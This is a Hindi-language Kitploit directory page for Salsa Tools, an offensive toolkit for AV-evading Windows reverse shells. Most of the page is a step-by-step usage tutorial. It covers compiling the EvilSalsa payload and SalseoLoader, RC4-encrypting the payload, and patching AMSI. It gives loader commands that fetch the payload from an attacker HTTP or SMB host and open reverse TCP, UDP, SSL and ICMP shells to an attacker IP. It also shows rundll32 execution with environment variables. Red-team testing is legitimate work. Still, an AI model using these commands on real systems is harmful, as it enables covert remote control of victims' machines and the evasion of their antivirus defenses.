Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Salsa-tools — Salsa Tools - ShellReverse TCP/UDP/ICMP/DNS/SSL/BINDTCP/Shellcode/SILENTTRINITY और AV बाइपास, AMSI पैच्ड | Kitploit
उपकरण/GitHubGitHub/hackplayers/salsa-tools
विशेषाधिकार वृद्धिएन्क्रिप्शन/डिक्रिप्शन उपकरणशोषणआईडीएस/आईपीएस से बचनापार्श्व आंदोलनशेलकोडपोस्ट-शोषणकमांड एंड कंट्रोलरेड टीमिंगपेलोड डेवलपमेंट
GitHubhackplayers/salsa-tools

Salsa-tools

5871306 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Salsa Tools - ShellReverse TCP/UDP/ICMP/DNS/SSL/BINDTCP/Shellcode/SILENTTRINITY और AV बाइपास, AMSI पैच्ड

रिपॉजिटरी देखें

License

root@kitploit:~
   _____       __              ______            __    
  / ___/____ _/ /________ _   /_  __/___  ____  / /____
  \__ \/ __ `/ / ___/ __ `/    / / / __ \/ __ \/ / ___/
 ___/ / /_/ / (__  ) /_/ /    / / / /_/ / /_/ / (__  ) 
/____/\__,_/_/____/\__,_/    /_/  \____/\____/_/____/  

Salsa Tools - bellota सॉस में डूबा एक AV-सुरक्षित रिवर्स शेल

Salsa Tools तीन अलग-अलग टूलों का एक संग्रह है, जो संयुक्त रूप से किसी भी Windows वातावरण में एक उन्नत रिवर्स शेल प्राप्त करने की अनुमति देता है, बिना इसके निष्पादन के लिए PowerShell की भी आवश्यकता के। नवीनतम पहचान तकनीकों (AMSI) से बचने के लिए, अधिकांश घटक मूल रूप से C# में लिखे गए थे। Salsa Tools को लुइस वाकास द्वारा सार्वजनिक रूप से उनके वार्ता "Inmersión en la explotación tiene rima" के दौरान जारी किया गया था, जो 9 फरवरी 2019 को h-c0n में हुआ था।

विशेषताएँ

root@kitploit:~
* TCP/UDP/ICMP/DNS/BIND/SSL/Shellcode/SilentTrinity     
* AV Safe (17 फरवरी)
* AMSI पैचर
* PowerShell निष्पादन
* ...

अवलोकन

Salsa-Tools तीन अलग-अलग सामग्रियों से बना है: - EvilSalsa - EncrypterAssembly - SalseoLoader और इसका व्यवहार इस प्रकार है:

सेटअप

आवश्यकताएँ

  • Visual Studio 2017 (या समान)
    • .NET 4.0 में कंपाइल करने के लिए Microsoft.PowerShell.3.ReferenceAssemblies निर्भरताएँ
    • .NET 3.5 में कंपाइल करने के लिए Microsoft.PowerShell.2.ReferenceAssemblies निर्भरताएँ
  • Python 2.7

Salsa चलाना

EvilSalsa पकाना

root@kitploit:~
   ___ __ __  ____  _            
  /  _]  |  ||    || |           
 /  [_|  |  | |  | | |           
|    _]  |  | |  | | |___        
|   [_|  :  | |  | |     |       
|     |\   /  |  | |     |       
|_____| \_/  |____||_____|       
                                 
  _____  ____  _     _____  ____ 
 / ___/ /    || |   / ___/ /    |
(   \_ |  o  || |  (   \_ |  o  |
 \__  ||     || |___\__  ||     |
 /  \ ||  _  ||     /  \ ||  _  |
 \    ||  |  ||     \    ||  |  |
  \___||__|__||_____|\___||__|__|
  
[+] यह हमारा पेलोड है
                                 

EvilSalsa इस रेसिपी की मुख्य सामग्री है। इसमें पेलोड होता है, जो सिस्टम पर इस प्रकार निष्पादित होता है: जैसे ही पेलोड शुरू होता है, यह System.Management.Automation.dll को चलाता है जो एक रनस्पेस बनाता है। उस रनस्पेस के भीतर हमारे पास चार प्रकार के शेल होते हैं (TCP/UDP/ICMP/DNS/BINDTCP/SHELLCODE/SILENTTRINITY)। एक बार EvilSalsa लोड हो जाने पर, सबसे पहले c:\windows\system32\amsi.dll के अस्तित्व की जाँच की जाती है। यदि यह मौजूद है, तो इसे CyberArk और Rastamouse बाईपास के एक घरेलू संस्करण का उपयोग करके पैच किया जाता है।

EncrypterAssembly और Evilsalsa को मिलाना

root@kitploit:~
  ______                             _            
 |  ____|                           | |           
 | |__   _ __   ___ _ __ _   _ _ __ | |_ ___ _ __ 
 |  __| | '_ \ / __| '__| | | | '_ \| __/ _ \ '__|
 | |____| | | | (__| |  | |_| | |_) | ||  __/ |   
 |______|_| |_|\___|_|   \__, | .__/ \__\___|_|   
     /\                   __/ | || |   | |        
    /  \   ___ ___  ___ _|___/|_|| |__ | |_   _   
   / /\ \ / __/ __|/ _ \ '_ ` _ \| '_ \| | | | |  
  / ____ \\__ \__ \  __/ | | | | | |_) | | |_| |  
 /_/    \_\___/___/\___|_| |_| |_|_.__/|_|\__, |  
                                           __/ |  
                                          |___/   
			  
 [+] RC4 का उपयोग करके पेलोड को एन्क्रिप्ट करने वाला सॉफ्टवेयर
 [+] हमारे पास python और .exe दोनों संस्करण हैं

EncrypterAssembly का उपयोग Python स्क्रिप्ट या Exe बाइनरी के रूप में किया जा सकता है। यह पहले से उत्पन्न EvilSalsa को एन्क्रिप्ट करता है।

Python उपयोग:

root@kitploit:~
python encrypterassembly.py <FILE> <PASSWORD> <OUTPUT>

निष्पादन योग्य उपयोग:

root@kitploit:~
Encrypterassembly.exe <FILE> <PASSWORD> <OUTPUT>

SalseoLoader के साथ एन्क्रिप्टेड EvilSalsa को टेबल पर लाना

SalseoLoader एन्क्रिप्टेड पेलोड को लोड करने के लिए जिम्मेदार है। इसे लाइब्रेरी या निष्पादन योग्य के रूप में कंपाइल किया जा सकता है। यदि इसे निष्पादन योग्य के रूप में चलाया जाता है, तो चुने गए तर्क निष्पादन के समय प्रदान किए जाने चाहिए। यदि इसे लाइब्रेरी के रूप में कंपाइल किया जाता है, तो डिस्क्रिप्टर "main" को एक्सपोर्ट किया जाना चाहिए। पर्यावरण चर का उपयोग करके तर्क जोड़े जाते हैं।

root@kitploit:~
  _____  ____  _     _____   ___   ___
 / ___/ /    || |   / ___/  /  _] /   \
(   \_ |  o  || |  (   \_  /  [_ |     |
 \__  ||     || |___\__  ||    _]|  O  |
 /  \ ||  _  ||     /  \ ||   [_ |     |
 \    ||  |  ||     \    ||     ||     |
  \___||__|__||_____|\___||_____| \___/

 _       ___    ____  ___      ___  ____
| |     /   \  /    ||   \    /  _]|    \
| |    |     ||  o  ||    \  /  [_ |  D  )
| |___ |  O  ||     ||  D  ||    _]|    /
|     ||     ||  _  ||     ||   [_ |    \
|     ||     ||  |  ||     ||     ||  .  \
|_____| \___/ |__|__||_____||_____||__|\_|

                             By: CyberVaca@HackPlayers

[+] उपयोग:

    [-] SalseoLoader.exe password http://webserver.com/elfuckingmal.txt ReverseTCP LHOST LPORT
    [-] SalseoLoader.exe password \\smbserver.com\evil\elfuckingmal.txt ReverseUDP LHOST LPORT
    [-] SalseoLoader.exe password c:\temp\elfuckingmal.txt ReverseICMP LHOST
    [-] SalseoLoader.exe password http://webserver.com/elfuckingmal.txt ReverseDNS LHOST ServerDNS
    [-] SalseoLoader.exe password http://webserver.com/elfuckingmal.txt BindTCP LHOST LPORT
    [-] SalseoLoader.exe password c:\temp\elfuckingmal.txt ReverseSSL LHOST LPORT
    [-] SalseoLoader.exe password http://webserver.com/shellcode.txt shellcode
    [-] SalseoLoader.exe password http://webserver.com/silent.txt silenttrinity URL_C2C

[+] उपलब्ध पेलोड:

    [-] ReverseTCP  [-] ReverseDNS   [-] ReverseSSL  [-] Shellcode
    [-] ReverseUDP  [-] ReverseICMP  [-] BindTCP     [-] SilentTrinity

ट्यूटोरियल

बाइनरी को कंपाइल करना

GitHub से सोर्स कोड डाउनलोड करें और EvilSalsa और SalseoLoader को कंपाइल करें। आपको कोड को कंपाइल करने के लिए Visual Studio इंस्टॉल करने की आवश्यकता होगी।

उन प्रोजेक्ट्स को उस विंडोज मशीन की आर्किटेक्चर के लिए कंपाइल करें जहाँ आप उनका उपयोग करने जा रहे हैं (यदि विंडोज x64 का समर्थन करता है, तो उन्हें उस आर्किटेक्चर के लिए कंपाइल करें)।

आप Visual Studio के अंदर बाएं "Build" टैब में "Platform Target" में आर्किटेक्चर चुन सकते हैं।

(यदि आपको ये विकल्प नहीं मिलते हैं, तो "Project Tab" पर प्रेस करें और फिर " Properties" पर प्रेस करें)

फिर, दोनों प्रोजेक्ट्स को बिल्ड करें (Build -> Build Solution) (लॉग में निष्पादन योग्य का पथ दिखाई देगा):

बैकडोर तैयार करें

सबसे पहले, आपको EvilSalsa.dll को एन्कोड करने की आवश्यकता होगी। ऐसा करने के लिए, आप Python स्क्रिप्ट encrypterassembly.py का उपयोग कर सकते हैं या प्रोजेक्ट EncrypterAssembly को कंपाइल कर सकते हैं।

Python

root@kitploit:~
python EncrypterAssembly/encrypterassembly.py <FILE> <PASSWORD> <OUTPUT_FILE>
python EncrypterAssembly/encrypterassembly.py EvilSalsa.dll password evilsalsa.dll.txt

Windows

root@kitploit:~
EncrypterAssembly.exe <FILE> <PASSWORD> <OUTPUT_FILE>
EncrypterAssembly.exe EvilSalsa.dll password evilsalsa.dll.txt

ठीक है, अब आपके पास वह सब कुछ है जो आपको पूरे Salseo कार्य को निष्पादित करने के लिए चाहिए: एन्कोडेड EvilSalsa.dll और SalseoLoader की बाइनरी। SalseoLoader.exe बाइनरी को मशीन पर अपलोड करें। इसे किसी भी AV द्वारा पहचाना नहीं जाना चाहिए...

बैकडोर निष्पादित करें

TCP रिवर्स शेल प्राप्त करना (HTTP के माध्यम से एन्कोडेड dll डाउनलोड करना)

रिवर्स शेल लिसनर के रूप में nc, और एन्कोडेड evilsalsa को सर्व करने के लिए एक HTTP सर्वर शुरू करना याद रखें।

SalseoLoader.exe password http://<Attacker-IP>/evilsalsa.dll.txt reversetcp <Attacker-IP> <Port>

UDP रिवर्स शेल प्राप्त करना (SMB के माध्यम से एन्कोडेड dll डाउनलोड करना)

रिवर्स शेल लिसनर के रूप में nc, और एन्कोडेड evilsalsa को सर्व करने के लिए एक SMB सर्वर (impacket-smbserver) शुरू करना याद रखें।

SalseoLoader.exe password \\<Attacker-IP>/folder/evilsalsa.dll.txt reverseudp <Attacker-IP> <Port>

SSL के साथ TCP रिवर्स शेल प्राप्त करना (स्थानीय फ़ाइल का उपयोग करके)

हमलावर मशीन के अंदर लिसनर सेट करें:

root@kitploit:~
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
openssl s_server -key key.pem -cert cert.pem -port <port> -tls1

बैकडोर निष्पादित करें:

root@kitploit:~
SalseoLoader.exe password C:/path/to/evilsalsa.dll.txt ReverseSSL <Attacker-IP> <Port>

ICMP रिवर्स शेल प्राप्त करना (एन्कोडेड dll पहले से पीड़ित में है)

इस बार आपको क्लाइंट पर रिवर्स शेल प्राप्त करने के लिए एक विशेष टूल की आवश्यकता है। डाउनलोड करें: [https://github.com/inquisb/icmpsh]

ICMP रिप्लाई अक्षम करें:

root@kitploit:~

#जब आप समाप्त कर लें, तो आप इसे फिर से सक्षम कर सकते हैं:
sysctl -w net.ipv4.icmp_echo_ignore_all=0

क्लाइंट निष्पादित करें:

python icmpsh_m.py "<Attacker-IP>" "<Victm-IP>"

पीड़ित के अंदर, salseo चीज़ निष्पादित करें:

SalseoLoader.exe password C:/Path/to/evilsalsa.dll.txt reverseicmp <Attacker-IP>

SalseoLoader को DLL के रूप में main फंक्शन को एक्सपोर्ट करके कंपाइल करना

Visual Studio का उपयोग करके SalseoLoader प्रोजेक्ट खोलें।

main फंक्शन से पहले जोड़ें: [DllExport]

main फंक्शन से पहले यह लाइन जोड़ें: [DllExport]

इस प्रोजेक्ट के लिए DllExport इंस्टॉल करें

Tools --> NuGet Package Manager --> Manage NuGet Packages for Solution...

DllExport पैकेज खोजें (Browse टैब का उपयोग करके), और Install प्रेस करें (और पॉपअप स्वीकार करें)

आपके प्रोजेक्ट फ़ोल्डर में फाइलें दिखाई दी हैं: DllExport.bat और DllExport_Configure.bat

DllExport अनइंस्टॉल करें

Uninstall प्रेस करें (हाँ, यह अजीब है लेकिन मेरा विश्वास करें, यह आवश्यक है)

Visual Studio से बाहर निकलें और DllExport_configure निष्पादित करें

बस Visual Studio से बाहर निकलें।

फिर, अपने SalseoLoader फ़ोल्डर में जाएं और DllExport_Configure.bat निष्पादित करें। x64 चुनें (यदि आप इसे x64 मशीन के अंदर उपयोग करने जा रहे हैं, यह मेरा मामला था), System.Runtime.InteropServices (DllExport के लिए नेमस्पेस के अंदर) चुनें और Apply प्रेस करें।

प्रोजेक्ट को फिर से Visual Studio के साथ खोलें

[DllExport] अब त्रुटि के रूप में चिह्नित नहीं होना चाहिए।

समाधान बिल्ड करें

Output Type = Class Library चुनें (Project --> SalseoLoader Properties --> Application --> Output type = Class Library)

x64 प्लेटफ़ॉर्म चुनें (Project --> SalseoLoader Properties --> Build --> Platform target = x64)

समाधान को बिल्ड करने के लिए: Build --> Build Solution (आउटपुट कंसोल में नई DLL का पथ दिखाई देगा)

उत्पन्न DLL का परीक्षण करें

DLL को वहाँ कॉपी और पेस्ट करें जहाँ आप इसका परीक्षण करना चाहते हैं।

निष्पादित करें:

rundll32.exe SalseoLoader.dll,main

यदि कोई त्रुटि नहीं आती है, तो संभवतः आपके पास एक कार्यात्मक dll है!!

DLL का उपयोग करके शेल प्राप्त करें

HTTP सर्वर का उपयोग करना और nc लिसनर सेट करना न भूलें

Powershell

root@kitploit:~
$env:pass="password"
$env:payload="http://10.2.0.5/evilsalsax64.dll.txt"
$env:lhost="10.2.0.5"
$env:lport="1337"
$env:shell="reversetcp"
rundll32.exe SalseoLoader.dll,main

CMD

root@kitploit:~
set pass=password
set payload=http://10.2.0.5/evilsalsax64.dll.txt
set lhost=10.2.0.5
set lport=1337
set shell=reversetcp
rundll32.exe SalseoLoader.dll,main

द्वारा प्रलेखित https://github.com/carlospolop-forks/

टूल डाउनलोड करें